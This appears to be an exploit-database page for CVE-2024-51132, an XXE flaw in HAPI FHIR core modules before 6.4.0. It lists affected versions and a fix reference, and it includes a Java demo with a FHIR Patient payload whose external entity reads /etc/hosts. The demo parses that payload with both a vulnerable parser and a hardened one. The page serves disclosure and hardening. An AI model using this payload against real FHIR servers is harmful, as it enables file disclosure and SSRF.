## https://sploitus.com/exploit?id=1D3D4BFD-D1DB-5288-B343-D4605A863015
# CVE-2024-51132-POC

### Vulnerability Type
**XXE - XML External Entity Injection**. The XXE vulnerability was found in multiple artifacts (modules) of the https://github.com/hapifhir/org.hl7.fhir.core/ repository. Because the affected XML parsers resolve external entities in attacker-supplied FHIR XML, the flaw can be further exploited for SSRF, information disclosure (for example local file contents), and similar attacks.
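The following is an added example that is not code from the org.hl7.fhir.core repository or from the referenced fix commit. It shows the general shape of the bug class: a FHIR-looking XML resource carrying a DTD with an external entity (the payload is constructed for illustration and only reads a local file; with an `http://` URL the same entity becomes an SSRF primitive), parsed once with a default JDK `DocumentBuilderFactory` and once with the usual hardening features (disallow DOCTYPE, disable external entities and external DTD access). Which exact features the project's fix applied is not stated on this page; the hardened configuration here is the standard one, not a claim about the commit.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

public class XxeDemo {
    // Constructed payload (not from the original page): a Patient resource whose
    // DTD declares an external entity. The entity is referenced from the narrative
    // <div> text node because the XML spec forbids external entities inside
    // attribute values. /etc/hosts is used only because it exists on most hosts.
    static final String PAYLOAD =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE Patient [\n"
      + "  <!ENTITY xxe SYSTEM \"file:///etc/hosts\">\n"
      + "]>\n"
      + "<Patient xmlns=\"http://hl7.org/fhir\">\n"
      + "  <text>\n"
      + "    <status value=\"generated\"/>\n"
      + "    <div xmlns=\"http://www.w3.org/1999/xhtml\">&xxe;</div>\n"
      + "  </text>\n"
      + "</Patient>";

    // Default JDK configuration: DOCTYPE is accepted and external general
    // entities are resolved, so the file content is substituted into the document.
    static DocumentBuilderFactory vulnerableFactory() {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true);
        return f;
    }

    // Hardened configuration: refuse any DOCTYPE up front, and additionally turn
    // off external entities, external DTD loading and XInclude in case a parser
    // implementation ignores the first feature.
    static DocumentBuilderFactory hardenedFactory() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return f;
    }

    // Parses the resource and returns the text of the narrative <div>, which is
    // where the expanded entity lands when the parser is vulnerable.
    static String narrativeText(DocumentBuilderFactory f, String xml) throws Exception {
        DocumentBuilder b = f.newDocumentBuilder();
        Document d = b.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return d.getDocumentElement()
                .getElementsByTagNameNS("http://www.w3.org/1999/xhtml", "div")
                .item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Vulnerable: the narrative now contains the contents of /etc/hosts. A
        // server that echoes the resource back (or includes it in an
        // OperationOutcome) leaks that data to the client. If the file does not
        // exist, the parser throws FileNotFoundException, which itself shows the
        // entity was fetched.
        System.out.println("vulnerable parser narrative:\n"
            + narrativeText(vulnerableFactory(), PAYLOAD));

        // Hardened: the DOCTYPE is rejected before any entity can be resolved.
        try {
            narrativeText(hardenedFactory(), PAYLOAD);
            System.out.println("unexpected: hardened parser accepted the DOCTYPE");
        } catch (SAXParseException e) {
            System.out.println("hardened parser rejected input: " + e.getMessage());
        }
    }
}
```

Compile and run with `javac XxeDemo.java && java XxeDemo`. When auditing a codebase for this bug class, the thing to grep for is every `DocumentBuilderFactory`, `SAXParserFactory`, `XMLInputFactory` and `TransformerFactory` instantiation, since each is a separate parser configuration and, as the comment below notes, one missed site is enough.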

### Affected Products and Versions
**org.hl7.fhir.convertors < 6.4.0**

**org.hl7.fhir.dstu2 < 6.4.0**

**org.hl7.fhir.dstu2016may < 6.4.0**

**org.hl7.fhir.dstu3 < 6.4.0**

**org.hl7.fhir.r4 < 6.4.0**

**org.hl7.fhir.r4b < 6.4.0**

**org.hl7.fhir.r5 < 6.4.0**

**org.hl7.fhir.utilities < 6.4.0**

**org.hl7.fhir.validation < 6.4.0**

### Comment
Found one of the vulnerable places with my code analysis tool on probably 10/19/2024. However, later I found there had been multiple commits by maintainers to fix the vulnerability, which showed there were even more places with the same issue than I thought.

### Reference
https://github.com/hapifhir/org.hl7.fhir.core/commit/7ede053a5fca50cc2802884c661a241d51703a67